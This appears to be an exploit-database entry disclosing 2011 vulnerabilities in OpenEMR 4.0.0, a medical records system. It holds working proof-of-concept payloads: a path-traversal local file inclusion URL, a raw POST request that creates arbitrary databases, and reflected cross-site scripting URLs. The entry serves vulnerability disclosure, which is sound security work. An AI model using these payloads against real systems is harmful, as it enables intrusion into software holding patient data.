OpenEMR 4.0.0 Local File Inclusion and Arbitrary Database Creation/Database Enumeration

vendor:

OpenEMR

by:

John Leitch

3,3

CVSS

LOW

Local File Inclusion and Arbitrary Database Creation/Database Enumeration

98, 564

CWE

Product Name: OpenEMR

Affected Version From: 4.0.0

Affected Version To: 4.0.0

Patch Exists: N/A

Related CWE: N/A

CPE: a:openemr:openemr

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista + XAMPP

2011

OpenEMR 4.0.0 Local File Inclusion and Arbitrary Database Creation/Database Enumeration

A local file inclusion vulnerability in OpenEMR 4.0.0 can be exploited to include arbitrary files. An attacker can exploit this vulnerability by sending a POST request with a maliciously crafted payload to the express.php script.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

------------------------------------------------------------------------
Software................OpenEMR 4.0.0
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.oemr.org/
Discovery Date..........4/2/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A local file inclusion vulnerability in OpenEMR 4.0.0 can be exploited
to include arbitrary files.


--PoC--

http://localhost/openemr-4.0.0/index.php?site=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

------------------------------------------------------------------------
Software................OpenEMR 4.0.0
Vulnerability...........Arbitrary Database Creation/Database Enumeration
Threat Level............Low (1/5)
Download................http://www.oemr.org/
Discovery Date..........4/2/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--PoC--

POST http://localhost/openemr-4.0.0/contrib/util/express.php HTTP/1.1
Host: localhost
Connection: keep-alive
User-Agent: x
Content-Length: 142
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="submit"

submit
------x
Content-Disposition: form-data; name="newname"

DatabaseName
------x--

------------------------------------------------------------------------
Software................OpenEMR 4.0.0
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.oemr.org/
Discovery Date..........4/2/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in OpenEMR 4.0.0 can be
exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/openemr-4.0.0/setup.php?site=%3Cscript%3Ealert(0)%3C/script%3E

http://localhost/openemr-4.0.0/gacl/admin/object_search.php?object_type=&action=&src_form=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E&section_value=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E